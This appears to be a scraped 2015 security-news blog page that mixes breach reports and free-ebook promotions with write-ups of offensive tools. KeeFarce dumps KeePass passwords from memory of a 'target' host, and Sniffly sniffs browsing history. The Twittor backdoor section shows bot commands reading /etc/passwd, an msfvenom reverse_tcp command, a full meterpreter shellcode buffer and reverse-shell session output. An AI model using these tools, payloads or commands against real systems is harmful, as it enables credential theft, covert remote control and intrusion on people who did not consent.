KeeFarce: Extract Passwords From KeePass 2.x Database Directly From Memory

KeeFarce: Extract Passwords From KeePass 2.x Database, Directly From memory.

KeeFarce allows for the extraction of KeePass 2.x password database information from memory. The cleartext information, including usernames, passwords, notes and url's are dumped into a CSV file in %AppData%.

General Design

KeeFarce uses DLL injection to execute code within the context of a running KeePass process. C# code execution is achieved by first injecting an architecture-appropriate bootstrap DLL. This spawns an instance of the dot net runtime within the appropriate app domain, subsequently executing KeeFarceDLL.dll (the main C# payload).

The KeeFarceDLL uses CLRMD to find the necessary object in the KeePass processes heap, locates the pointers to some required sub-objects (using offsets), and uses reflection to call an export method.

Prebuilt Packages

An appropriate build of KeeFarce needs to be used depending on the KeePass target's architecture (32 bit or 64 bit). Archives and their shasums can be found under the 'prebuilt' directory.

Executing

In order to execute on the target host, the following files need to be in the same folder:

• BootstrapDLL.dll
• KeeFarce.exe
• KeeFarceDLL.dll
• Microsoft.Diagnostic.Runtime.dll

Copy these files across to the target and execute KeeFarce.exe

Building

Open up the KeeFarce.sln with Visual Studio (note: dev was done on Visual Studio 2015) and hit 'build'. The results will be spat out into dist/$architecture. You'll have to copy the KeeFarceDLL.dll files and Microsoft.Diagnostic.Runtime.dll files into the folder before executing, as these are architecture independent.

Compatibility

KeeFarce has been tested on:

KeePass 2.28, 2.29 and 2.30 - running on Windows 8.1 - both 32 and 64 bit.
This should also work on older Windows machines (win 7 with a recent service pack). If you're targeting something other than the above, then testing in a lab environment before hand is recommended.

Download

Police Arrested Second Teenager Over TalkTalk Hack

Second Teenager Arrested Over TalkTalk Hack.

Last week 4 Million Customers of UK based company TalkTalk Data have been breached.

According to Press Release from Metropolitan Police,

Police have arrested a second teenage boy in connection with the investigation into alleged data theft from TalkTalk.

On Thursday, 29 October, detectives from the Metropolitan Police Cyber Crime Unit (MPCCU) executed a search warrant at an address in Feltham. At the address, a 16-year-old boy was arrested on suspicion of Computer Misuse Act offences. He has now been bailed - we await confirmation of the bail date.

A search of the residential address in Feltham has been completed. Officers have also searched a residential address in Liverpool.

Enquiries by the MPCUU supported by officers from the National Crime Agency (NCA) continue.

A 15-year-old boy from County Antrim, Northern Ireland, was arrested on Monday, 26 October, by officers from the Police Service of Northern Ireland (PSNI), working with detectives from the Cyber Crime Unit on suspicion of Computer Misuse Act offences.

He was taken into custody at a County Antrim police station and has since been bailed to a date in November.

Detectives from the MPCCU continue to investigative and have launched a joint investigation with the PSNI's Cyber Crime Centre (CCC) and the NCA. "


The Hacker News reported the first arrest, 15 years Old boy from County Antrim was arrested.

Within a week, police arrested teenager over TalkTalk hack. Investigation is still ongoing.
Company shares dropped down after the cyber attack on the company.

TOR Released Beta Messenger A Cross-Platform Chat Program Based On Instantbird

TOR Released Beta Messenger A Cross-platform Chat Program Based On Instantbird.

Tor Messenger is a cross-platform chat program that aims to be secure by default and sends all of its traffic over Tor. 

It supports a wide variety of transport networks, including Jabber (XMPP), IRC, Google Talk, Facebook Chat, Twitter, Yahoo, and others; enables Off-the-Record (OTR) Messaging automatically; and has an easy-to-use graphical user interface localized into multiple languages.

InstantBird:
A number of messaging clients: Pidgin, Adam Langley's xmpp-client, and Instantbird. Instantbird was the pragmatic choice -- its transport protocols are written in a memory-safe language (JavaScript); it has a graphical user interface and already supports many natural languages; and it's a XUL application, which means we can leverage both the code (Tor Launcher) and in-house expertise that the Tor Project has developed working on Tor Browser with Firefox. It also has an active and vibrant software developer community that has been very responsive and understanding of our needs. The main feature it lacked was OTR support, which we have implemented and hope to upstream to the main Instantbird repository for the benefit of all Instantbird (and Thunderbird) users.

Instructions

• On Linux, extract the bundle(s) and then run: ./start-tor-messenger.desktop
• On OS X, copy the Tor Messenger application from the disk image to your local disk before running it.
• On all platforms, Tor Messenger sets the profile folder for Firefox/Instantbird to the installation directory.
• Note that as a policy, unencrypted one-to-one conversations are not allowed and your messages will not be transmitted if the person you are talking with does not have an OTR-enabled client. You can disable this option in the preferences to allow unencrypted communication but doing so is not recommended.

Downloads

• Linux (32-bit)
• Linux (64-bit)
• Windows
• OS X
• sha256sums.txt
• sha256sums.txt.asc

Source: TOR

13 Million Users Data Breached Of Free Web Hosting Company 000Webhost

13 Million Users Data Leaked With Plain Text Password Of Free Web Hosting Company 000Webhost.

000webhost is providing a free web hosting service for PHP and MySQL. The leaked data includes users names and e-mail addresses.

Troy Hunt explained in detail about this breach.
According to Forbes Report
Hunt discovered user accounts had their passwords reset, but without any direct notice to customers. When Hunt tried to login with his own email address, an auto-generated response told him his password had been reset by 000Webhost “for security reasons”, advising him to change his credentials before continuing. There was no public notification.

users started to complain on the site forum they could not access FTP servers used to host their website files.

Free WebHost said in Facebook Page

Hello,

We have witnessed a database breach on our main server.

What happened?
A hacker used an exploit in old PHP version to upload some files, gaining access to our systems. Although the whole database has been compromised, we are mostly concerned about the leaked client information.

What did we do about it?
First of all, we removed all illegally uploaded pages as soon as we became aware of the breach. Next, we changed all the passwords and increased their encryption to avoid such mishaps in the future. A thorough investigation to make sure the breach does not exist anymore is in progress.

What do you need to do?
As all the passwords have been changed to random values, you now need to reset them. DO NOT USE YOUR PREVIOUS PASSWORD. PLEASE ALSO CHANGE YOUR PASSWORDS IF YOU USED THE SAME PASSWORD ANYWHERE ELSE.

Client Area Password
Please visit Password Reminder tool at http://members.000webhost.com/forgot_password.php and enter your email address, the new password will be sent to your email. Afterwards, login to your account with the new password and manually set a new, secure password at http://members.000webhost.com/edit_your_details.php

Hosting Account Password
To reset the password for your hosting account (and FTP), visit "Change Account Password" section on control panel and enter a new password there.

Email Account Password
Email account passwords should be changed by visiting "Manage Email Accounts" section and clicking "Change password" for each email account.

MySQL User (Database) Password
MySQL user passwords are managed in "MySQL" section on control panel. In the "Action" field click the "Change Password" and set a new password there.

We apologize for this hassle but it has to be done to ensure your data is safe. We are going to upgrade our systems step by step and will be aiming to be super-careful in future.

Regards
000webhost Team "

WhatsApp Bot Seed: A Small Python Framework To Create A WhatsApp Bot Like A Web Framework

A small python framework to create a whatsapp bot, with regex-callback message routing (just like a web framework).

What it does?

Basic message handling:
Example

Automatic media (images and videos) download, and url print screens
Example

Youtube Video Downloads, and Text to Speech
Example

Google image and web search
Example

Group administration
Example

Installation

• Install the image handling system dependencies on bash opt/system-requirements.sh
• Create a virtualenv and install the requirements pip install -r opt/requirements.pip
• Follow the instructions on src/config.py to get the whatsapp credentials.
• Then just run the server with python src/server.py

To create your own views, check the src/router.py, and the src/view/basic_views.py for a simple example.

Download

Predicting Malicious Behavior: Tools and Techniques for Ensuring Global Security (A $54.99 Value) FREE

"Predicting Malicious Behavior: Tools and Techniques for Ensuring Global Security (A $54.99 Value) FREE for a Short Time!"

A groundbreaking exploration of how to identify and fight security threats at every level.

This revolutionary book combines real-world security scenarios with actual tools to predict and prevent incidents of terrorism, network hacking, individual criminal behavior, and more. Written by an expert with intelligence officer experience who invented the technology, it explores the keys to understanding the dark side of human nature, various types of security threats (current and potential), and how to construct a methodology to predict and combat malicious behavior.

• Guides you through the process of predicting malicious behavior, using real world examples and how malicious behavior may be prevented in the future.
• Illustrates ways to understand malicious intent, dissect behavior, and apply the available tools and methods for enhancing security.
• Covers the methodology for predicting malicious behavior, how to apply a predictive methodology, and tools for predicting the likelihood of domestic and global threats.

Predicting Malicious Behavior fuses the behavioral and computer sciences to enlighten anyone concerned with security and to aid professionals in keeping our world safer.


Free Download now

Sniffly To Sniffing Browser History Using HSTS And CSP

Sniffly Trick For Browser Fingerprinting. Sniffing browser history using HSTS + CSP.

Sniffly is an attack that abuses HTTP Strict Transport Security and Content Security Policy to allow arbitrary websites to sniff a user's browsing history. It has been tested in Firefox and Chrome.

How it works

I recommend reading the inline comments in src/index.js to understand how Sniffly does a timing attack in both FF and Chrome without polluting the local HSTS store. tl;dr version:

1. User visits Sniffly page
2. Browser attempts to load images from various HSTS domains over HTTP
3. Sniffly sets a CSP policy that restricts images to HTTP, so image sources are blocked before they are redirected to HTTPS. This is crucial! If the browser completes a request to the HTTPS site, then it will receive the HSTS pin, and the attack will no longer work when the user visits Sniffly.
4. When an image gets blocked by CSP, its onerror handler is called. In this case, the onerror handler does some fancy tricks to time how long it took for the image to be redirected from HTTP to HTTPS. If this time is on the order of a millisecond, it was an HSTS redirect (no network request was made), which means the user has visited the image's domain before. If it's on the order of 100 milliseconds, then a network request probably occurred, meaning that the user hasn't visited the image's domain.

Finding HSTS hosts

To scrape an included list of sites (util/strict-transport-security.txt, courtesy Scott Helme) to determine which hosts send HSTS headers, do:

$ cd util
$ ./run.sh <number_of_batches> > results.log

where 1 batch is 100 sites. You can override util/strict-transport-security.txt with a different list, such as the full Alexa Top 1M, if you want.

To process and sort the results by max-age, excluding ones with max-age less than 1 day and ones that are preloaded:

$ cd util
$ ./process.py <results_file> > processed.log

Once that's done, you can copy the hosts from processed.log into src/index.js.

Running sploitz

Visiting file:///path/to/sniffly/src/index.html in Chrome should just work. In Firefox, CSP headers using the tag are apparently not supported yet, so you need to set up a local webserver to serve the CSP HTTP response header. My Nginx server block looks something like this:

server {
    listen 8081;
    server_name localhost;
    location / {
        root /path/to/sniffly/src;
        add_header Content-Security-Policy "img-src http://*";
        index index.html;
    }
}

Caveats

Not supported yet in Safari, IE, or Chrome on iOS.
Extensions such as HTTPS Everywhere will mess up results.
Doesn't work reliably in Tor Browser since timings are rounded to the nearest 100-millisecond.
Users with a different HSTS preload list (ex: due to having an older browser) may not see accurate results.

More info available in my ToorCon 2015 slides: https://zyan.scripts.mit.edu/presentations/toorcon2015.pdf.

Demo

Visit http://zyan.scripts.mit.edu/sniffly/ in Firefox/Chrome/Opera with HTTPS Everywhere disabled. If you use an ad blocker, a bunch of advertising domains will probably show up in the "Probably Visited" column (ignore them).

Download

UnEncrypted 4 Million TalkTalk Customers Data Got Hacked

UnEncrypted 4 Million TalkTalk Customers Data Got Hacked

UK Based Company TalkTalk Got Hacked .. 4 Million Customers Data have been breached. Company said that data was not encrypted. Its easy to open all data including Email and Bank details.

TalkTalk Telecom Group plc is a company which provides pay television, telecommunications, internet access, and mobile network services to businesses and consumers in the United Kingdom.

These data been affected?

Company said, the investigation is still ongoing. The Metropolitan Police is investigating this case. But unfortunately there is a chance that some of the following data may have been compromised:

1. Names
2. Addresses
3. Dates of birth
4. Email addresses
5. Telephone numbers
6. TalkTalk account information
7. Credit card details and/or bank details

Last night TalkTalk website was unavailable with message: 

"Sorry we are currently facing technical issues, [and] our engineers are working hard to fix it. We apologise for any inconvenience this may cause."

According to report, TalkTalk website was attack by DDOS.

Company also warn to the customers be alert of the Phishing emails attack, it might be the next step of Cyber criminals.

Lets Encrypt Offers Free SSL Certificates To All Websites

Lets Encrypt Offers Free SSL Certificates To All Websites.

Lets Encrypt Your Website with Free HTTPS Certificate.

Hyper Text Transfer Protocol Secure (HTTPS) is the secure version of HTTP, the protocol over which data is sent between your browser and the website that you are connected to. The 'S' at the end of HTTPS stands for 'Secure'. It means all communications between your browser and the website are encrypted.

According to Lets Encrypt

We’re pleased to announce that we’ve received cross-signatures from IdenTrust, which means that our certificates are now trusted by all major browsers. This is a significant milestone since it means that visitors to websites using Let’s Encrypt certificates can enjoy a secure browsing experience with no special configuration required.

Both Let’s Encrypt intermediate certificates, Let’s Encrypt Authority X1 and Let’s Encrypt Authority X2, received cross-signatures. Web servers will need to be configured to serve the appropriate cross-signature certificate as part of the trust chain. The Let’s Encrypt client will handle this automatically.

You can see an example of a server using a Let’s Encrypt certificate under a new cross-signed intermediate here.

Vital personal and business information is flowing over the Internet more frequently than ever, and it’s time to encrypt all of it. That’s why we created Let’s Encrypt, and we’re excited to be one big step closer to bringing secure connections to every corner of the Web.

Company will offer Free HTTPS Certificate by November 2015.

Mobile Security: How to Secure, Privatize, and Recover Your Devices (A $26.99 Value!) Free eBook For A Limited Time

Mobile Security: How to Secure, Privatize, and Recover Your Devices (A $26.99 Value!) Free eBook for a limited time

Learn how to keep your data secure when you’re on the go.

Mobile phones and tablets enhance our lives, but they also make you and your family vulnerable to cyber-attacks or theft. This clever eBook will help you secure your devices and know what to do if the worst happens.

Download

Wikileaks Released CIA Head Email Accounts Details

Wikileaks Released CIA Head Email Accounts Details

Yesterday Wikileaks Tweeted about to publish the Email account details.

ANNOUNCE: We have obtained the contents of CIA Chief John Brennan's email account and will be releasing it shortly.

— WikiLeaks (@wikileaks) October 21, 2015

According to Wikileaks,

"Today, 21 October 2015 and over the coming days WikiLeaks is releasing documents from one of CIA chief John Brennan's non-government email accounts. Brennan used the account occasionally for several intelligence related projects.

John Brennan became the Director of the Central Intelligence Agency in March 2013, replacing General David Petraeus who was forced to step down after becoming embroiled in a classified information mishandling scandal. Brennan was made Assistant to the President for Homeland Security and Counterterrorism on the commencement of the Obama presidency in 2009--a position he held until taking up his role as CIA chief.

According to the CIA Brennan previously worked for the agency for a 25 year stretch, from 1980 to 2005.

Brennan went private in 2005-2008, founding an intelligence and analysis firm The Analysis Corp (TAC). In 2008 Brennan became a donor to Obama. The same year TAC, led by Brennan, became a security advisor to the Obama campaign and later that year to the Obama-Biden Transition Project. It is during this period many of the Obama administration's key strategic policies to China, Iran and "Af-Pak" were formulated. When Obama and Biden entered into power, Brennan was lifted up on high, resulting in his subsequent high-level national security appointments."


Wikileaks didn't released Full  documents yet, they said more to come in coming days

Here is the CNN Interview of Hacker who Hacked CIA Director Email Account,

LiME Linux Memory Extractor

LiME ~ Linux Memory Extractor

A Loadable Kernel Module (LKM) which allows for volatile memory acquisition from Linux and Linux-based devices, such as Android.

This makes LiME unique as it is the first tool that allows for full memory captures on Android devices. It also minimizes its interaction between user and kernel space processes during acquisition, which allows it to produce memory captures that are more forensically sound than those of other tools designed for Linux memory acquisition.

Table of Contents

• Features
• Usage
• Examples
• Presentation

Features

• Full Android memory acquisition
• Acquisition over network interface
• Minimal process footprint

Usage

Detailed documentation on LiME's usage and internals can be found in the "doc" directory of the project.

LiME utilizes the insmod command to load the module, passing required arguments for its execution.

insmod ./lime.ko "path=<outfile | tcp:<port>> format=<raw|padded|lime> [dio=<0|1>]"

path (required):   outfile ~ name of file to write to on local system (SD Card)
        tcp:port ~ network port to communicate over

format (required): raw ~ concatenates all System RAM ranges
        padded ~ pads all non-System RAM ranges with 0s
        lime ~ each range prepended with fixed-size header containing address space info

dio (optional):    1 ~ attempt to enable Direct IO
        0 ~ default, do not attempt Direct IO

localhostonly (optional):  1 restricts the tcp to only listen on localhost, 0 binds on all interfaces (default)

Examples

In this example we use adb to load LiME and then start it with acquisition performed over the network

$ adb push lime.ko /sdcard/lime.ko
$ adb forward tcp:4444 tcp:4444
$ adb shell
$ su
# insmod /sdcard/lime.ko "path=tcp:4444 format=lime"

Now on the host machine, we can establish the connection and acquire memory using netcat

$ nc localhost 4444 > ram.lime

Acquiring to sdcard

# insmod /sdcard/lime.ko "path=/sdcard/ram.lime format=lime"


Download

How To Boost Your Wi-Fi Signal With Beer Can

How To Boost Your Wi-Fi Signal With Beer Can?

Have you ever think that your Beer Can boost your Wi-Fi Signal.

Here is the Steps:

1. Take Beer can
2. Wash out to clean the Can
3. Cut the Can Bottom around.
4. Now repeat the process on top of the Can and leave 1 and 2 inch space some space.
5. Place it Over Routers Antenna
6. Now Wi-Fi signals is boosting 2x-4x speed through Beer Can.
7. Beer Can Aluminium reacts as Reflector.
8. Now ping your Wi-Fi Speed to check your booster signals.

Check this Video:

CIA Director Email Account Gets Hacked By 19 Year Old Student

CIA Director Email Account Gets Hacked By 19 Years Old Student.

Teen, who claimed that he hacked CIA Director "John Brennan" AOL Email account. 

“We are aware of the reports that have surfaced on social media and have referred the matter to the appropriate authorities,” a CIA spokesman said.

But this report is really shocking that how he easily hacked CIA director personal Email account.

How Teenager Breached into The Email?
According to Wired, he wasn’t working alone but that he and two other people worked on the breach. He says they first did a reverse lookup of Brennan’s mobile phone number to discover that he was a Verizon customer. Then one of them posed as a Verizon technician and called the company asking for details about Brennan’s account. This process called Social Engineering.

What he found into the Mail?

• 47 page application for top Secret Security clearance.
• Social Security Numbers and personal information of more than a dozen top US intelligence officials.
• Hackers also claimes to have accessed a Comcas account associater with Johnson.

Teenage hackers was handling the Twitter account @_CWA_, where he leaked

• Phone numbers
• Social Security Numbers
• E-mail addresses
• A level of security clearance and employment status in some cases

After the report Twitter Suspended his account.

According to nypost,
He explained “CWA” stood for “Crackas With Attitude,” which he said referred to him and a classmate.

The hacker contacted The Post last week to brag about his exploits, which include posting some of the stolen documents and a portion of Brennan’s contact list on Twitter. The hacker’s Twitter page includes the Muslim Shahada creed, which translates as, “There is no god but Allah, Muhammad is the messenger of Allah.”

Facebook Will Tell You If Any Government Is Spying On Your Account

Facebook Will Tell You If Any Government Is Spying On Your Account.

Facebook CSO Alex Stamos said in statement

The security of people's accounts is paramount at Facebook, which is why we constantly monitor for potentially malicious activity and offer many options to proactively secure your account. Starting today, we will notify you if we believe your account has been targeted or compromised by an attacker suspected of working on behalf of a nation-state. This is what the notification looks like on the desktop version of the Facebook website:

While we have always taken steps to secure accounts that we believe to have been compromised, we decided to show this additional warning if we have a strong suspicion that an attack could be government-sponsored. We do this because these types of attacks tend to be more advanced and dangerous than others, and we strongly encourage affected people to take the actions necessary to secure all of their online accounts.

It's important to understand that this warning is not related to any compromise of Facebook's platform or systems, and that having an account compromised in this manner may indicate that your computer or mobile device has been infected with malware. Ideally, people who see this message should take care to rebuild or replace these systems if possible.

To protect the integrity of our methods and processes, we often won't be able to explain how we attribute certain attacks to suspected attackers. That said, we plan to use this warning only in situations where the evidence strongly supports our conclusion. We hope that these warnings will assist those people in need of protection, and we will continue to improve our ability to prevent and detect attacks of all kinds against people on Facebook.

Alex Stamos is the Chief Security Officer at Facebook.

How To Securing Health Data In a BYOD World

Securing Health Data In a BYOD World.

This white paper will provide pragmatic insights on: 
Identifying risks, Developing and implementing policies, Focusing on information instead of devices, Securing data across all endpoints, Promoting usability. Use this information to help your organization fully prepare for the risks and rewards of BYOD.

Long Description:
In many ways, Bring Your Own Device (BYOD) sounds good to healthcare leaders. It can improve productivity, optimize practitioners' time and even reduce capital expenditures. But there's a flip side to BYOD that often sends shudders down the spines of healthcare IT executives and hospital administrators: As BYOD usage increases, so can security vulnerabilities.

Research studies reveal some startling statistics about the risk healthcare organizations face when implementing BYOD programs.

Consider these data points:

• 39% of employees don't password-protect their mobile devices.
• 52% access corporate information via unsecured WiFi networks.
• 29% of organizations do nothing to manage applications on BYOD endpoints.
• Only 24% of personal smartphones can be remotely wiped by a corporate IT department.

Finally, and perhaps most astonishing: Only 9% of organizations are fully aware of the devices accessing their network.

These risks may seem daunting, however, advancements in planning and technology are enabling healthcare organizations to deploy secure, HIPAA compliant BYOD initiatives that simplify and improve patient care while safeguarding PHI.

Download Free WhitePaper

Hackers Can Steal Your Information Through EarPhones

Hackers Can Steal Your Information Through EarPhones..

As we are aware about that Google Voice or Siri are tracking us via our mobile devices so that represents a security risks too.

French Information Security ANSSI research have figured out that how to utilize radio waves to silently trigger voice summons on iPhones or Android devices on the off chance that they utilize headphones and have Google Now or Siri empowered.

Security researchers unveiled that hackers can steal your information to make calls, send texts or browse a Malware website without notifying you. its over 16 feet they can use the attack on your smartphone.

According to Wired,
The researcher utilized the earphones' cord as a radio wire and exploited is wire to change over electromagnetic waves into electrical signals that told the smartphone that orders to be sound are originating from the user microphone.

Earlier, IEEE report was published on the same topic,

Research exploit the principle of front-door coupling on smartphones headphone cables with specific electromagnetic waveforms. We present a smart use of intentional electromagnetic interference, resulting in finer impacts on an information system than a classical denial of service effect. As an outcome, we introduce a new silent remote voice command injection technique on modern smartphones.

How Radio Attack dangerous Silently?

• It can make calls
• To Send text messages
• Browsing Phishing or Malware websites
• Spam Messaging through Social Media Accounts

How this attack works ?
Watch Video:

Web Penetration Testing with Kali Linux Free eBook Valued at $29.99

Web Penetration Testing with Kali Linux (Free eBook Valued at $29.99) Plus 3 Bonus Resources

This is the book you need to be fully up-to-speed with this powerful open-source toolkit -- and you're getting 3 additional security resources to increase your knowledge as well.

Testing web security is best done through simulating an attack. Kali Linux lets you do this to professional standards and this is the book you need to be fully up-to-speed with this powerful open-source toolkit.

You'll also receive the following security-related resources:

• Web Penetration Testing with Kali Linux
• 15 Steps to Reducing Security Risks in Business Mobility
• The Client Mandate on Security
• Preparing for The New World of Data Privacy

Offered Free by: TradePub

Download

Another Zero Day Vulnerability Found In Adobe Flash

Another "Zero Day" Vulnerability Found In Adobe Flash

The researchers of TrendMicro found Zero day exploit in Adobe Flash Plugin. The Flash zero-day affects at latest version of Adobe Flash Player versions 19.0.0.185 and 19.0.0.207.

According to research Pawn Storm campaign are behind this attack said Trend Micro and they are targeting by sending Phishing Emails with attached exploit links. Suicide car bomb targets NATO troop convoy Kabul” said TrendMicro

“Syrian troops make gains as Putin defends air strikes”

“Israel launches airstrikes on targets in Gaza”

“Russia warns of response to reported US nuke buildup in Turkey, Europe”

“US military reports 75 US-trained rebels return Syria”

Adobe Affected Version by TrendMicro

How Can we Protect?

How to patch flash 0-day: 1) Uninstall flash 2) You don't need flash 3) Stop installing flash

— MalwareTech (@MalwareTechBlog) October 13, 2015

TrendMicro said that they sent report to Adobe. But still Adobe does not patched this vulnerability.

System Administration & Security - Salary & Skills Report

"System Administration & Security - Salary & Skills Report"

What you need to know to earn more in system administration and security.

Diverse and rapidly changing, network administration and security is the backbone of the 21st century workplace. What are the essential skills of the modern system admin? Does it pay to specialize, or go polyglot? Which tech is the overwhelming top pick in the world of configuration management?

Download this report to learn more.

Offered Free by: PackT Publishing

Download

Advanced Penetration Testing for Highly-Secured Environments: The Ultimate Security Guide (a $35.99 value) Free

"Advanced Penetration Testing for Highly-Secured Environments: The Ultimate Security Guide (a $35.99 value) Free!"

Learn to perform professional penetration testing for high-secured environments with this intensive hands-on guide.

Advanced Penetration Testing for Highly Secured Environments provides step-by-step instructions on how to emulate a highly secured environment on your own equipment using VirtualBox, pfSense, snort, and similar technologies. This enables you to practice what you have learned throughout the book in a safe environment.

You will also get a chance to witness what security response teams may see on their side of the penetration test while you are performing your testing!

This free offer won't be available for very long,

Offered Free by: PackT Publishing

Download

Twittor A Fully Featured Backdoor That Uses Twitter As Command And Control Server

Twittor: A Fully Featured Backdoor That Uses Twitter As Command And Control Server..

A stealthy Python based backdoor that uses Twitter (Direct Messages) as a command and control server This project has been inspired by Gcat which does the same but using a Gmail account.

Setup

For this to work you need:

• A Twitter account (Use a dedicated account! Do not use your personal one!)
• Register an app on Twitter with Read, write, and direct messages Access levels.

Install the dependencies:

$ pip install -r requirements.txt

This repo contains two files:

twittor.py which is the client
implant.py the actual backdoor to deploy

In both files, edit the access token part and add the ones that you previously generated:

CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'

You're probably going to want to compile implant.py into an executable using Pyinstaller In order to remove the console when compiling with Pyinstaller, the flags --noconsole --onefile will help. Just saying.

Usage
In order to run the client, launch the script.

$ python twittor.py

You'll then get into an 'interactive' shell which offers few commands that are:

$ help

    refresh - refresh C&C control
    list_bots - list active bots
    list_commands - list executed commands
    !retrieve <jobid> - retrieve jobid command
    !cmd <MAC ADDRESS> command - execute the command on the bot
    !shellcode <MAC ADDRESS> shellcode - load and execute shellcode in memory (Windows only)
    help - print this usage
    exit - exit the client

$ 

Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:

$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
$

The output is the MAC address which is used to uniquely identifies the system but also gives you OS information the implant is running on. In that case a Linux box.

Let's issue a command to an implant:

$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd
[+] Sent command "cat /etc/passwd" with jobid: UMW07r2
$

Here we are telling B7:76:1F:0B:50:B7 to execute cat /etc/passwd, the script then outputs the jobid that we can use to retrieve the output of that command

Lets get the results!

$ !retrieve UMW07r2
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
(...)

Command to use in that case is !retrieve followed by the jobid from the command.

Refresh results
In order to retrieve new bots/command outputs but also force the client to refresh the results, use the refresh command.

$ refresh
[+] Sending command to retrieve alive bots
[+] Sleeping 10 secs to wait for bots
$

This will send a PING request and wait 10 seconds for them to answer. Direct messages will then be parsed - Bot list will be refreshed but also the command list, including new command outputs.

Retrieve previous commands
As I said earlier, (previous) commands will be retrieved from older direct messages (limit is 200) and you can actually retrieve/see them by using the list_commands command

$ list_commands
8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
$

Running shellcode (Windows hosts)
This option might be handy in order to retrieve a meterpreter session and this article becomes really useful.

Generate your meterpreter shellcode, like:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python
(...)
Payload size: 299 bytes
buf =  ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x00\x00\x01\x68"
buf += "\x02\x00\x0e\x1f\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
buf += "\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a"
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6"
buf += "\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"

Extract the shellcode and send it to the specified bot using the !shellcode command!

$ !shellcode 11:22:33:44:55 \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (...)
[+] Sent shellcode with jobid: xdr7mtN
$

There you go!

msf exploit(handler) > exploit

[*] Started reverse handler on 10.0.0.1:3615 
[*] Starting the payload handler...
[*] Sending stage (884270 bytes) to 10.0.0.99
[*] Meterpreter session 1 opened (10.0.0.1:3615 -> 10.0.0.99:49254) at 2015-09-08 10:19:04 -0400

meterpreter > getuid
Server username: WIN-XXXXXXXXX\PaulSec

Contributing and/or questions?
Project is entirely open source and released under MIT license. I mostly wanted to create a PoC after Twitter decided to remove the 140 characters limit for the Direct Messages. Few stuff should be added such as Encryption (Adding AES on top of it). "Messages" are using a dictionary data structure and the whole command is only base64 encoded. Fork the project, contribute, submit pull requests, and have fun.

Download

Note: This is the only Educational purpose

How Hackers are Using Google AdWords Service to Hack AdWords Users

How Hackers are Using Google AdWords Service to Hack AdWords Users?

While searching 'Adwords' related term on Google search engine, I just noticed a mysterious website on the top of the search results.

On opening that page, I found how cyber criminal are using google ads to promote a AdWords Phishing page effectively to redirect and steal users account password.

Screenshot as show below,

